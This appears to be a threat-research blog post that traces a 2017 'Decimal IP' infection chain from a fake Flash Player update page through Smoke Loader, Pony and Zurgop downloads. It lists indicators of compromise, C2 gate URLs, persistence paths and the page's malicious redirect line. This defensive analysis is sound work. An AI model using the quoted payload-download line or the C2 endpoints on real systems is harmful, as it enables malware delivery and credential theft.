Decimal IP Campaign

For a background on the Decimal IP Campaign please read this article written on March 29th, 2017, by Jérôme Segura over at Malwarebytes Lab:

https://blog.malwarebytes.com/cybercrime/2017/03/websites-compromised-decimal-ip-campaign/

I got the decimal IP used for this infection from ‘s blog post found HERE.

IOCs:

  • 104.156.250.131 – IP decimal redirector
  • 162.220.246.254 – Fake Flash Player update landing page
  • 23.56.113.194 – java.com – Connectivity check
  • 173.199.70.191 – aoids03wkde38.us
  • 195.154.72.149 – aoids03wkde38.us
  • 195.154.72.149 – aoids03wkde38.win
  • 89.163.224.57 – zxcpondfk23jklasd.pro – POST /po/asdfkuj.php
    • ET TROJAN Fareit/Pony Downloader Checkin 2
  • 23.105.70.78 – vfbyteddsdcs.net – GET /asdoiu398j/gate.php?client_id=aed68d54&connected=0&server_port=0&debug=0
  • 23.105.70.78 –  mybyteddsdcs.info
    • ET INFO Suspicious Windows NT version 9 User-Agent
    • ET TROJAN Generic gate[.].php GET with minimal headers
  • 5.9.123.8 – static.8.123.9.5.clients.your-server.de
  • 23.61.164.138 – ocsp.int-x3.letsencrypt.org

Traffic Filtered in Wireshark:

Traffic 1

Traffic 2

My User-Agent for this infection was IE 11 and I didn’t use a compromised website. Instead, I went directly to the decimal IP at 1755118211, which then redirected my host to 104.156.250.131. The response from that GET request resulted in a redirect to a fake Flash Player update landing page at 162.220.246.254:

302 Found - 162.220.246.254

The fake Flash Player update page at 162.220.246.254 was mirrored from update-flash-player.com, which no longer resolves. Here is an image of the fake Flash Player page:

Decimal IP fake flash player landing page

In the source code of the page contains the following location.href:

setTimeout(“location.href = ‘hxxp://162.220.246.254/flashplayer24pp_id_install.exe?dl=1’;”, 1000);

This prompts the user to open or save flashplayer24pp_id_install.exe. The executable is being identified as Smoke Loader:

https://www.virustotal.com/en/file/b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7/analysis/

https://www.hybrid-analysis.com/sample/b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7?environmentId=100

The last time I got Smoke Loader it downloaded Neutrino Bot:

https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/

Persistence found during this infection:

C:\Users[User]\AppData\Roaming\Microsoft\rdverhfw\rvugiufe.exe

HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN

persistance 1

After letting the infection system sit idle for about 10 minutes we see additional malware (CC81.tmp.dll) dropped in %Temp%:

Temp

Scanning CC81.tmp.dll on VirusTotal and Hybrid-Analysis showed that it was Pony:

https://www.virustotal.com/en/file/8a58666380d5f15d71877675d995a8898e152fa6df4d87b0dbc0f079f2f3c640/analysis/

https://www.hybrid-analysis.com/sample/8a58666380d5f15d71877675d995a8898e152fa6df4d87b0dbc0f079f2f3c640?environmentId=100

This is followed by Pony callback traffic via POST requests to zxcpondfk23jklasd.pro/po/asdfkuj.php. Other URLs found in the binary/memory include:

Pattern match: “hxxp://pondfk23jklasd.pro/po/asdfkuj.php” (resolves to 89.163.224.57)
Pattern match: “hxxp://pondfk23jklasd.us/po/asdfkuj.php” (resolves to 89.163.224.57)
Pattern match: “hxxp://aweqwe23e234.info/po/asdfkuj.php” (resolves to 89.163.224.57)
Pattern match: “hxxp://sdf2345r232342.info/po/asdfkuj.php” (resolves to 89.163.224.57)

Later we see an executable called tdcbwl.exe dropped in %AppData%:

AppData

Scanning the file on VirusTotal and Hybrid-Analysis shows it could be Zurgop downloader:

https://www.virustotal.com/en/file/ff45b45c745c820d09e2c37661bde12f7ec739388fcf497af7592978232ee3b1/analysis/

https://www.hybrid-analysis.com/sample/ff45b45c745c820d09e2c37661bde12f7ec739388fcf497af7592978232ee3b1?environmentId=100

This is followed by GET requests to the following URLs:

vfbyteddsdcs.net/asdoiu398j/gate.php?client_id=aed68d54&connected=0&server_port=0&debug=0

vfbyteddsdcs.net 1

Connects to 5.9.123.8 via TCP port 1079

vfbyteddsdcs.net/asdoiu398j/gate.php?client_id=aed68d54&connected=1&server_port=54023&debug=0

vfbyteddsdcs.net 2

My infected host is making connections to 5.9.123.8 via TCP port 1079 every 5 minutes:

Traffic 3

TCP port scan on 5.9.123.8:

PORT     STATE SERVICE
25/tcp   open  smtp
1067/tcp open  instl_boots
1075/tcp open  rdrmshc
1079/tcp open  asprovatalk

Artifacts from this infection:

Artifacts.zip

You can download the malware from the Hybrid-Analysis reports.

Until next time!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: